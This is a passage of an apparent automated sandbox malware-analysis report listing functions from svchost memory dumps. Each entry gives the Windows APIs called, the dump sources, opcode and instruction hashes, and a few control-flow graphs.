                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4604594dd80deaa7dc65681505de0cd38ecb63ec40db0f49576e2dc26c5e6384
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4851093062DE4D4FEB55AEAC989836A72E1FB99320F20013AE54FC3594DE78D881C785
                                                                                                                                                                                                                                                                                                          Function 00007DF426AA5870 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f9c10d06f27717c523a2b4302f1ad03c132034baba63a38b2d21c1b59cc56e71
                                                                                                                                                                                                                                                                                                          • Instruction ID: e10e71bb11ff1c475df74bc6b60e98ab5904bd5d68e31a692eca6116966eeb4d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9c10d06f27717c523a2b4302f1ad03c132034baba63a38b2d21c1b59cc56e71
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1613971918A888BE765EF64D8946EBB7F1FB95310F004A3FE08FC6191DE38A545CB42
                                                                                                                                                                                                                                                                                                          Function 00007DF426AC0BC4 Relevance: 1.7, APIs: 1, Instructions: 184processCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 116f0dd2ddb23dccfb2c6d9efb5d8776a97d5f43ca21374b7ec22c06ed2d75d4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 14eb1e2bc12e04b2ab3b5d86b789287295f9b5191199f9f2a66b03b1e3ba941a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 116f0dd2ddb23dccfb2c6d9efb5d8776a97d5f43ca21374b7ec22c06ed2d75d4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC512F3461CB888FE765DB18D85576BB7E5FFD9311F00093EE48AC3191DA74E9018B92
                                                                                                                                                                                                                                                                                                          Function 00007DF426AA84B4 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • TlsFree.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000000,00007DF426AA37B8), ref: 00007DF426AA85F1
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3978063606-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f566a557f405a15e9f60543e31327f656da7bfedb9a26ca6cc3cf471634a3ab7
                                                                                                                                                                                                                                                                                                          • Instruction ID: a52ab2a9beb3e394fafb27ea34d92e56a634a462c09dc75ec83ddfead8c4e3a3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f566a557f405a15e9f60543e31327f656da7bfedb9a26ca6cc3cf471634a3ab7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF418330B08A898FEB54EF688C9556A73B1EF5A720B144537E40FC7286DA29EC018BC1
                                                                                                                                                                                                                                                                                                          Function 000001C27640973C Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 000001C27640C440: VirtualFree.KERNELBASE(?,?,?,?,?,?,?,000001C2764097CF), ref: 000001C27640C4D8
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32 ref: 000001C276409834
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorFreeModeVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3123725612-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c558a3bee63eb8d82cfee7bb6036631f102c00f5edc4b5b2d839b26d2bc08f01
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4f1ca75175b1d007e37f5c421d2f4717d7ca5269f1e73066295b427000452b2a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c558a3bee63eb8d82cfee7bb6036631f102c00f5edc4b5b2d839b26d2bc08f01
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88319331258B184BFB79FB69D8D1FD973E5EBA4300F400558F44AC7292EE74D9108781
                                                                                                                                                                                                                                                                                                          Function 00007DF426AA36BC Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1e60da0387532ed08b6b2c4227f9f253aabf7bfeb9f956a08f44f065dffbf384
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D318121B1C9855BEB98FB689C9256E72F2EF5A320B50043BE00FC32D2D91CAD458686
                                                                                                                                                                                                                                                                                                          Function 00007DF426AE9878 Relevance: 1.6, APIs: 1, Instructions: 93networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: socket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 98920635-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                                                                                                                                                                                                          • Instruction ID: 477e353905b242427a4d2d2dfd556d69f88120ffb264a4c86bf1cef69db814dc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C215630B08A444FEF58EB789C8D66673E1FB56335F10467AE82FC72E6DA289C41C651
                                                                                                                                                                                                                                                                                                          Function 00007DF426AA6748 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: getaddrinfo
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 300660673-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                                                                                                                                                                                                          • Instruction ID: 92ecc9ca934e577d507b017bde325cc935388cdbe6c37a89e0ee4a728f355ab4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08314B70618A488FEB54DF28C898A5673F1FF99714F10417AD84ED7291DB39E802CF41
                                                                                                                                                                                                                                                                                                          Function 00007DF426AE8420 Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: socket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 98920635-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 640abeb5c6b2b1bc35f62c2643cd99f43d88f06d202f511bb8515c624a1d4051
                                                                                                                                                                                                                                                                                                          • Instruction ID: dfbe970f5a7660aabce0ea9990549b81e5213e84709412647b3dab0a8f1632e4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 640abeb5c6b2b1bc35f62c2643cd99f43d88f06d202f511bb8515c624a1d4051
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36118730718D494FEA58AB6C9C8476672E5FB4A335F50063BE51FC22D2DB29AC46C340
                                                                                                                                                                                                                                                                                                          Function 00007DF426AAFB24 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007DF426ABE150: NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF426ABC0F7), ref: 00007DF426ABE160
                                                                                                                                                                                                                                                                                                          • realloc.MSVCRT ref: 00007DF426AAFB59
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPortrealloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1589556540-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 404d992d80ce28f588e6575ef2a58a6672b7331dba98a01d15c19ea0354211cd
                                                                                                                                                                                                                                                                                                          • Instruction ID: c5e09677a827372295d50f008e5cd4e51f28f4bf5ee1eb2f24963498c08bef13
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 404d992d80ce28f588e6575ef2a58a6672b7331dba98a01d15c19ea0354211cd
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3018032B089454FF7A8A7B96CE837B69F5EF99261B100137E50FC3285EE28DE404281
                                                                                                                                                                                                                                                                                                          Function 000001C276404AE0 Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 520 1c276404ae0-1c276404b00 521 1c276404b02-1c276404b0c 520->521 522 1c276404b61 520->522 523 1c276404b0e-1c276404b1c 521->523 524 1c276404b40-1c276404b52 call 1c276409460 521->524 525 1c276404b63-1c276404b7a call 1c276409990 522->525 527 1c276404b1e-1c276404b2f 523->527 524->525 533 1c276404b54-1c276404b5f LoadLibraryA 524->533 530 1c276404b36-1c276404b3e 527->530 531 1c276404b31 527->531 530->524 530->527 531->530 533->525
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2720f2c82129b4cf1e9cdd73d7b21f18690d3eabbfb2c3e4d773bbe3f80b722c
                                                                                                                                                                                                                                                                                                          • Instruction ID: edb6ac9a5824b325ac4c8f7f9a13a8787649ff5581b7a2f3044e72fd462286f8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2720f2c82129b4cf1e9cdd73d7b21f18690d3eabbfb2c3e4d773bbe3f80b722c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C711D631568B588BF7B5EB3888A57FA73E0F7A5304F4041A9D48AC21D1EE38C50AC742
                                                                                                                                                                                                                                                                                                          Function 00007DF426A92B48 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3861752e6b5c76be2cebb9ad67872b18419a5ea734a6e2a755e753fd2cd8f93e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7886c25ab0491bbdd220fd777997c69ceff3498c02262ddab5f6f1e7b2a8ebe9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3861752e6b5c76be2cebb9ad67872b18419a5ea734a6e2a755e753fd2cd8f93e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C301A230A259098FDB54AF69DCC862673F6FB89321B544075E80AC7145DA76A881CB54
                                                                                                                                                                                                                                                                                                          Function 000001C27640C54C Relevance: 1.5, APIs: 1, Instructions: 47libraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C276401000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_1c276401000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0ef85e6c49b167f6fa9e03bb0202aec9cadee554545795ea33251ab7e92968d2
                                                                                                                                                                                                                                                                                                          • Instruction ID: ca6b00a32cc91a6f3545814f94f575951570400b185fbb9f2546724122a28884
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ef85e6c49b167f6fa9e03bb0202aec9cadee554545795ea33251ab7e92968d2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA01C834228B188FF774EB39C495BFA72D5F764305F5044A9E48AC2281EA78C954CB42
                                                                                                                                                                                                                                                                                                          Function 00007DF426AE8374 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: closesocket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2781271927-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 88f570aa19942cbceb8937b7800559f16cfa9926cc3a62739dcadfc924c76aed
                                                                                                                                                                                                                                                                                                          • Instruction ID: 023975ae181e220037b47f11133339c63cc0a3b0709d35f0f8d59cc4234db5a9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88f570aa19942cbceb8937b7800559f16cfa9926cc3a62739dcadfc924c76aed
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58014B70914A498FEF84DF28C8C87213BE4EF55329F4411BADC0ACA29AD379EC90C780
                                                                                                                                                                                                                                                                                                          Function 00007DF426A92D94 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f69c4423fc2f9dc24249204a85e6f753c59304eed0840573d92f1e176759654c
                                                                                                                                                                                                                                                                                                          • Instruction ID: a7eaebd2b8032e714d2a9dab7550b24fa6aebf21ecd976173c2c9bcfc9ea537c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f69c4423fc2f9dc24249204a85e6f753c59304eed0840573d92f1e176759654c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51F0E521E1E64C4BE714BEBA6CC026631E1EFC6330F34453BD60FC2A81D97988C19254
                                                                                                                                                                                                                                                                                                          Function 00007DF426AA3424 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressCallerProc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2663294120-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: b55f2987ccf9d47b878492792b43a4e8323f4fb48d1ec303df731e7bfe889620
                                                                                                                                                                                                                                                                                                          • Instruction ID: 27ab9adbad757e311ac04dbe9aa2a67c9093288d0fd362ef71a5b897f680eed0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b55f2987ccf9d47b878492792b43a4e8323f4fb48d1ec303df731e7bfe889620
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEE0C211B08C0D1B6B6861AE288C57755E6CBDC133314027BE41EC3295EC15CC810384
                                                                                                                                                                                                                                                                                                          Function 00007DF426AC0DCC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4c721ddc8cb176db938021c85e5f400d5d7596dc62bee08ed1c2796866c985cb
                                                                                                                                                                                                                                                                                                          • Instruction ID: 185d46c588ea2e4567bcae6b34181abe55dfdcdb206542bcc00ac7c0aea2c954
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c721ddc8cb176db938021c85e5f400d5d7596dc62bee08ed1c2796866c985cb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93E0C232B191240BE72C6ABD2C8917A36CAC7CC572B06827BFC06C3284DC68CC5602D0
                                                                                                                                                                                                                                                                                                          Function 00007DF426AA33F8 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                                                                                                                                                                          • Instruction ID: 78da37d54860d051bbf6f27b4abd4ee20a822f15c7d42384b6a4e1658b36813e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BD0A711729D0D0BEA48677D1C9472751E5EBDC331F50013BF50EC2281E959CC954300
                                                                                                                                                                                                                                                                                                          Function 00007DF426B1D66C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00007DF426B2EF2F,?,?,?,?,00000000,00000000), ref: 00007DF426B1D689
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0c8b29b2e46d8ecbda91bf3fbd1e3dce5dd76455cbfab89285b4f133e11fa366
                                                                                                                                                                                                                                                                                                          • Instruction ID: e386cb3181fea6210766febcf9ddfc4934cbd90c9e0d1bf58a2d156659e83a99
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c8b29b2e46d8ecbda91bf3fbd1e3dce5dd76455cbfab89285b4f133e11fa366
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CE04F3161480887F749F731DC994E77362FBA6310B804677D80B810E6EE6DA24ACAC2
                                                                                                                                                                                                                                                                                                          Function 000001C2760700FC Relevance: 1.5, APIs: 1, Instructions: 203COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.1671053578.000001C276070000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C276070000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_1c276070000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: abb3666d5f0e7e3691c5e241d5b349d303e7c196ced747a2022f8ae30c0d6593
                                                                                                                                                                                                                                                                                                          • Instruction ID: 115bb40f71c5674fb7474e61c8ab6e161b959623cb89e26263691d8a0a8c109a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abb3666d5f0e7e3691c5e241d5b349d303e7c196ced747a2022f8ae30c0d6593
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 099190B12587818FE7A0CB18C485B6ABBF0FB99308F544A6DF5CAC7291DB35D841DB06
